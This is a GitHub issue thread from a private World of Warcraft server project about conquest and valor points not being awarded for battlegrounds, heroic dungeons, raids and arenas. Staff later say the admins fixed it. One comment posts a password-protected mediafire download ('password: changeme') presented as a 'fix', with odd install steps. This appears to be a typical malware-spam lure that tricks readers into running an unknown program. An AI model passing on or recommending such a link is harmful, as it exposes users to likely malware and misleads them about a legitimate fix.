### ISSUE TITLE
Valor/Conquest points for Dungeons / BGs/ Arenas

### ISSUE THREAD

**Issue by WhitemaneChronus** [gamefreedomgit/Maelstrom#6104]
[//]: # (REMBEMBER! Add links to things related to the bug using for example:)
[//]: # (https://www.wowhead.com/cata)

**Description:**

There seems to be an issue with conquest and valor point rewards. 
We are receiving a lot of reports in this regard for the followings in the past few days:
- First win of the day in BGs not rewarding conquest points
- Random heroic dungeon after defeating last boss, not rewarding valor points
  - Players are not capped on valor
  - Players are not capped on weekly valor gain
- Players are not getting valor points in raids.
- Arena wins not rewarding conquest points

**How it should work:**

Conquest and valor points should be rewarded accordingly

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Sketish** [comment]
> **Description:**
> 
> There seems to be an issue with conquest and valor point rewards. We are receiving a lot of reports in this regard for the followings in the past few days:
> 
> * First win of the day in BGs not rewarding conquest points
> * Random heroic dungeon after defeating last boss, not rewarding valor points
>   
>   * Players are not capped on valor
>   * Players are not capped on weekly valor gain
> * Players are not getting valor points in raids.
> * Arena wins not rewarding conquest points
> 
> **How it should work:**
> 
> Conquest and valor points should be rewarded accordingly

I need more details what dungeons/raids so I can check that on ptr

**Comment by WhitemaneChronus** [comment]
It was an issue in game for all bosses,
Fixed by admins.
